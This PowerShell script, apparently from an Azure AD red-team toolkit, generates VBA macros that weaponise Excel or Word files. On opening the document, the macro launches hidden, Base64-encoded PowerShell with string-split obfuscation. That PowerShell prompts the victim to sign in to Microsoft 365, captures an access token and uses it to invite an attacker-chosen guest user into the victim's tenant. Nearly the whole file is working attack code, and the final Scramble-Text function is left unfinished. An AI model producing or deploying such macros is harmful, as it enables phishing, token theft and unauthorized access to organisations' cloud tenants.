WBAWeaponiser.ps1
|
# This script contains functions for weaponising Office files # Aug 6th 2020 function Generate-InvitationVBA { <# .SYNOPSIS Creates a VBA script block to weaponise Excel files to invite the given guest user to their tenant. .DESCRIPTION Creates a VBA script block to weaponise Excel files to invite the given guest user to their tenant. The script starts when the Excel workbook is opened: * Opens an Office 365 login window to get an access token * Using the access token, sends an invitation for the given email address Copy the generated script to clipboard and paste to Excel .Example New-AADIntInvitationVBA -Email someone@gmail.com | Set-ClipBoard #> [cmdletbinding()] Param( [Parameter(Mandatory=$True)] [String]$Email, [Validateset("Workbook","Document")] [String]$Type="Workbook" ) Process { # # Generate the PowerShell code block # # First some needed assemblies are imported. # Second, a Windows form object is created with a web browser control. The Outlook app id is used. # Third, the login window is shown and access token is fetched # Finally, the invitation for the given user is sent $e="`$e=""$Email"";" $code=@' Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Web; $r="https://graph.microsoft.com"; $i="d3590ed6-52b3-4102-aeff-aad2292ab01c"; $u="urn:ietf:wg:oauth:2.0:oob"; $l="https://login.microsoftonline.com/common/oauth2/authorize?resource=$r&client_id=$i&response_type=code&haschrome=1&redirect_uri=$u&client-request-id=$((New-Guid).ToString())&prompt=login&scope=openid profile"; $f=[Windows.Forms.Form]::new(); $f.Width=560; $f.Height=680; $f.FormBorderStyle=3; $f.TopMost=$true; $w=[Windows.Forms.WebBrowser]::new(); $w.Size=$f.ClientSize; $w.Anchor="Left,Top,Right,Bottom"; $f.Controls.Add($w); $w.add_Navigated({if($_.Url.ToString().StartsWith($u)){$f.DialogResult="OK";$f.Close();};}); $w.Navigate($l); if($f.ShowDialog()-ne"OK"){$f.Controls[0].Dispose();return}; $a=[Web.HttpUtility]::ParseQueryString($f.Controls[0].Url.Query); $b=@{client_id=$i;grant_type="authorization_code";code=$a["code"];redirect_uri=$u}; $f.Controls[0].Dispose(); $c="application/x-www-form-urlencoded"; $o=irm -Uri "https://login.microsoftonline.com/common/oauth2/token" -ContentType $c -Method POST -Body $b; $b="{""invitedUserEmailAddress"":""$e"",""sendInvitationMessage"":true,""inviteRedirectUrl"":""https://myapps.microsoft.com""}"; $o=irm -Uri "https://graph.microsoft.com/beta/invitations" -Method Post -Body $b -Headers @{"Authorization"="Bearer $($o.access_token)"}; '@ # Convert the code block to Unicode and decode it with Base64 $unicode=[text.encoding]::Unicode.getBytes("$e$code") $code=[convert]::ToBase64String($unicode) # # Create the VBA Code # # Generate a random function name $funcName = -join ((97..122) | Get-Random -Count 32 | % {[char]$_}) $VBA = @" Private Sub $($Type)_Open() $funcName End Sub Sub $funcName()`n "@ $p = 1 # Split the Base64 encoded code to shorter chunks While(($p*500) -lt $code.Length) { $codeStr = $($code.Substring(($p-1)*500,500)) #$codeStrArr= $codeStr.ToCharArray() #[array]::Reverse($codeStrArr) #$codeStr = -join($codeStrArr) $VBA += " i$p = ""$codeStr""`n" $p++ } $VBA += " i$p = ""$($code.Substring(($p-1)*500,$code.Length-($p-1)*500))""`n" $VBA += " c1 = Chr(34) & ""pow"" & ""ershel"" & ""l.exe"" & Chr(34)`n" $VBA += " c2 = ""-EncodedCommand """ for($i=1;$i -lt $p+1 ; $i++) { $VBA += " & i$i" } $VBA += "`n" # Set PowerShell to start as hidden $VBA += " c3 = "" -WindowStyle Hidden""`n" # Create Wscript.shell object $VBA += " Set s2 = CreateObject(""Ws"" & ""cript"" & "".s"" & ""hell"")`n" # Invoke the PowerShell minimized $VBA += " s2.Run c1 & c2 & c3, 2`n" $VBA += "End Sub`n" # Return $VBA } } function Scramble-Text { [cmdletbinding()] Param( [Parameter(Mandatory=$True)] [String]$Text, [Parameter(Mandatory=$True)] [String]$Secret ) Process { $secretArray=$Secret.ToCharArray() $num=0 foreach($char in $secretArray) { $num+=$char } $num = $num % 256 $textArray = $Text.ToCharArray() } } |